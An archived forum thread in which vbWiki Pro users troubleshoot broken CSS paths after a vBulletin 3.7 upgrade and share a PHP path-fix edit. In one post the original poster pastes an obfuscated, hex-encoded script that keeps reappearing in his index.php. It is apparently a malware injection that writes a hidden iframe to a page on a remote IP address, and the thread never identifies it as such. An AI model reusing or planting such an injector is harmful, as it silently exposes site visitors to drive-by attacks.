Go Back   NuHIT - SEO, Wiki, Forums > vbWiki Pro Forums > vbWiki Pro - Installation and Support
Reply
 
Thread Tools
 
#1
Old 04-29-2008, 08:46 PM
 
petforum
Premium Member
 
Join Date: Nov 2007
Posts: 16
petforum is offline  
Question

vbWiki Pro and Vbulletin 3.7 CSS Problem


Hi,
I've been running vbWiki Pro successfully for a while now. I just upgraded my VBulletin to 3.7 and the look and feel of my vbulletin hasnt been updated on my wiki.
My forum can be seen at http://www.petforums.co.uk and if you click on the tab at the top of the page that says 'Pet Encyclopedia' you will see that the vbulletin stylesheet seems to be messed up.
Has anyone got any ideas how to fix this please? It must be something simple i've missed.
http://www.petforums.co.uk/encyclopedia/Welcome
Many Thanks
Mark
http://www.petforums.co.uk
Reply With Quote

#2
Old 04-30-2008, 10:34 AM
 
Question

Hi,

Has anyone got any ideas?

When I checked the source on my encyclopedia I see the following imported vbulletin css :

@import url("clientscript/vbulletin_css/style-847d6b45-00001.css");

and on my photo gallery it has the full server path:

@import url("http://www.petforums.co.uk/clientscr...6b45-00001.css");

I presume that the problem is because the path to the vbulletin css on the encyclopedia has not got the full path and is looking in the incorrect place for the CSS.

Does anyone know where and what needs to be changed to get this to work.


Mark
petforum
Premium Member
 
Join Date: Nov 2007
Posts: 16
petforum is offline  
Reply With Quote

#3
Old 05-02-2008, 07:29 AM
 
Alfa1
Moderator
 
Join Date: Nov 2006
Posts: 585
Alfa1 is offline  
Please do not cross post. Your other threads have been deleted. I am not using vbwiki pro, so I do not know the answer to your question.
__________________
__________________
__________________

Unfortunately, the developer has disappeared last year. There is no official support for NuHit products. Some products no longer work.
Although I am not part of Nuhit staff, I will support/advise customers where I can and moderate the NuHit forums. Please read more information here.
Reply With Quote

#4
Old 05-02-2008, 07:31 AM
 
Hi,

I posted in the wrong section at first by mistake. No worries, I have resolved my problem now.

Thanks
Mark
petforum
Premium Member
 
Join Date: Nov 2007
Posts: 16
petforum is offline  
Reply With Quote

#5
Old 05-02-2008, 10:01 PM
 
freshfroot
Premium Member
 
freshfroot's Avatar
 
Join Date: Aug 2007
Location: Canada
Posts: 167
Send a message via MSN to freshfroot
freshfroot is offline  
I'll "hopefully" be upgrading to 3.7 and will let ya know if I encounter the same problem.
Reply With Quote

#6
Old 05-04-2008, 04:48 AM
 
Question

Hi,

I've realised whats causing it, but still cant fix it permanantly. In my Index.php in my Wiki directory I keep getting a lot of script which looks like rubbish put at the end of the file as shown below. Every time I delete it, my wiki works fine, but then the next day the script appears again without me touching the file. Anyone know why? The script is below :


<script>function v481d74cb26209(v481d74cb26a01){ var v481d74cb271f7=16; return(parseInt(v481d74cb26a01,v481d74cb271f7));}f unction v481d74cb281fd(v481d74cb28fe5){ var v481d74cb2a59d=2; var v481d74cb295b8='';for(v481d74cb29db5=0; v481d74cb29db5<v481d74cb28fe5.length; v481d74cb29db5+=v481d74cb2a59d){ v481d74cb295b8+=(String.fromCharCode(v481d74cb2620 9(v481d74cb28fe5.substr(v481d74cb29db5, v481d74cb2a59d))));}return v481d74cb295b8;} document.write(v481d74cb281fd('3C5343524950543E776 96E646F772E7374617475733D27446F6E65273B646F63756D6 56E742E777
269746528273C696672616D65206E616D653D6638207372633 D5C27687474703A2F2F37372E32323
12E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6 174682E726F756E64284D6174682E72
616E646F6D28292A323138363630292B2732343339665C2720 77696474683D333737206865696768
743D353830207374796C653D5C27646973706C61793A206E6F 6E655C273E3C2F696672616D653E27
293C2F5343524950543E'))</script>
petforum
Premium Member
 
Join Date: Nov 2007
Posts: 16
petforum is offline  
Reply With Quote

#7
Old 05-06-2008, 10:33 AM
 
gedsta
Premium Member
 
Join Date: Jan 2007
Posts: 30
gedsta is offline  
Mark
How did you fix this with the CSS? We are having the same issues.
Reply With Quote

#8
Old 05-06-2008, 10:47 AM
 
Hi,

I havent fixed it. Like I said I delete all the script at the bottom of the index.php file every day. But for some reason it keeps reappearing, I havent got a clue what keeps updating this file. Does anyone know??

Thanks
Mark
petforum
Premium Member
 
Join Date: Nov 2007
Posts: 16
petforum is offline  
Reply With Quote

#9
Old 05-07-2008, 02:58 AM
 
AScherff
Premium Member
 
Join Date: May 2007
Posts: 9
AScherff is offline  
thanks for te hint..

there is a php-script that changes pathes:

/vbWiki/arcane_vbulletin_core.php

There is a function:

function arcane_vb_fix_relative_urls

i added:

PHP Code:
    $search = array(
        
'clientscript/vbulletin_css/',

..........


    
$replace = array(    
        
"$g_Arcane_Forum_URL_Base/clientscript/vbulletin_css/"
so the url will be added correctly.
Reply With Quote

#10
Old 05-07-2008, 07:43 AM
 
Thats the baby, it now works - Thank you.
gedsta
Premium Member
 
Join Date: Jan 2007
Posts: 30
gedsta is offline  
Reply With Quote

#11
Old 05-27-2008, 12:59 AM
 
volarium
Premium Member
 
Join Date: Mar 2007
Posts: 2
volarium is offline  
This solution worked for me as well.

http://wiki.vfrworld.com/index.php/VFRwiki
Reply With Quote

#12
Old 07-26-2008, 10:53 PM
 
hmm not working for me when i added this
jts2005
Premium Member
 
Join Date: Aug 2007
Posts: 3
jts2005 is offline  
Reply With Quote

#13
Old 07-27-2008, 04:30 PM
 
sowosammerneger
Premium Member
 
Join Date: Aug 2007
Posts: 13
sowosammerneger is offline  
Mine is wrecked too and the hint doesn't work for me too.

Any other hints available?
Reply With Quote

#14
Old 07-30-2008, 05:38 AM
 
check all path if there replaced correct. If you find a path not translatet, add to that function with the right replace.

For me it works well up to 3.7.2 PL1
AScherff
Premium Member
 
Join Date: May 2007
Posts: 9
AScherff is offline  
Reply With Quote

#15
Old 08-27-2008, 05:46 AM
 
EricDesMontagnes
Premium Member
 
Join Date: Sep 2007
Posts: 45
EricDesMontagnes is offline  
Is is the same thing with my problem ? http://www.nuhit.com/forums/vbwiki-p...-not-work.html
__________________
Baldur's Gate World Wiki - La Couronne de Cuivre
View vBWiki Pro in action : here
View vBulletin in action : here
Using vBseo
Reply With Quote

Reply


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Problem Login into admincp vbulletin jimjamzoo vBulletin 0 01-04-2008 02:53 PM
vbWiki really needs more vBulletin Hooks pegasus Suggestions & Feedback 13 05-08-2007 11:38 AM


All times are GMT -4. The time now is 11:34 PM.